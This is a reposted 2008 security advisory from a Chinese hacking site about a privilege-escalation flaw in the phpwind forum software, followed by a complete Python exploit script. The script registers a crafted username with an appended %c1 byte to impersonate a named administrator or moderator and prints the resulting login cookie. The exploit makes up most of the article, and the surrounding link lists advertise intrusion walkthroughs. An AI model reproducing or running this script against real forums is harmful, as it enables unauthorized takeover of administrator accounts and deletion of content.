·	phpwind管理权限泄露漏洞	06-01	·	免费发彩信的工具	06-01
·	不安装/不修改文件让XP	06-01	·	藏再隐秘也没用高效利用	06-01
·	EveryDNS提供免费域名DN	06-01	·	ZWRO互联提供500M免费全	06-01
·	对 XP中出现故障服务进行	05-30	·	让XP和Vista一样拥有动态	05-30
·	让病毒和木马白白运行	05-29	·	给你的IE套件盔甲	05-29
·	轻松破解Vista系统密码	05-29	·	利用sohu网站URL跳转漏洞	05-29
·	F2blog XMLRPC 上传文件	05-29	·	FLASH网马现身互联网	05-29
·	我在入侵过程中注意到的	05-29	·	用好Windows Server 200	05-29
·	OpenDNS提供免费DNS服务	05-29	·	易生网络科技提供50M免费	05-29
·	与众不同！Vista下上网冲	05-28	·	你还知道Windows桌面“刷	05-28
·	Cn.vc时尚免费域名申请/	05-28	·	海风网络科技提供100M免	05-28
·	解决windiows2003+sp1下	05-27	·	网马的运行分析续篇	05-27
·	IE的0DAY网马	05-27	·	XP下双开3389远程控制的	05-27
·	利用IAT hook实现window	05-27	·	让Windows Server 2008上	05-27

[推荐]phpwind管理权限泄露漏洞+利用程序

荐 ★★★★★

phpwind管理权限泄露漏洞+利用程序

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-6-1 9:54:14

漏洞发布：http://www.80sec.com/
漏洞作者：jianxin@80sec.com
漏洞厂商： http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害：高
漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作

利用方式：http://www.80sec.com有提供exploit
漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心构造的数据注册用户即可获得管理权限
漏洞修补：建议关闭注册功能等待官方出补丁
漏洞状态：
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞

暂无补丁

原始地址：http://www.80sec.com/release/phpwind-exploit.txt

漏洞测试：

以下是引用片段：
# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def banner():
    print ""
    print "########################################################"
    print "Phpwind所有版本管理权限泄露漏洞利用poc"
    print "Copyright (C) 2006"
    print "jianxin@80sec.com"
    print "80sec是一个新的致力于web安全的小团体"
    print "http://www.80sec.com"

def usage():
    banner()
    print "Usage:\n"
    print "   $ ./phpwind.py pwforumurl usertoattack\n"
    print "   pwforumurl    目标论坛地址如http://www.80sec.com/"
    print "   usertoattack    目标拥有权限的斑竹或管理员"
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
    print "   最新版本可以使用uid登陆"
    print "   其他版本可以使用cookie+useragent登陆"
    print "########################################################"
    print ""

argvs=sys.argv
usage()

data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2" % (argvs[2],”%c1″)
pwurl = “%s/register.php” % argvs[1]

request = urllib2.Request(
    url     = pwurl ,
        headers = {’Content-Type’ : ‘application/x-www-form-urlencoded’,’User-Agent’: ’80sec owned this’},
        data    = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
    if cookie.index(’winduser’):
        print “Exploit Success!”
        print “Login with uid password @80sec or Cookie:”
        print cookie
        print “User-agent: 80sec owned this”
except:
    print “Error! http://www.80sec.com”
    print “Connect root#80sec.com”

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： F2blog XMLRPC 上传文件漏洞及修补方法

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

实例讲解跨站入侵攻防战之攻击篇	05-08
对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26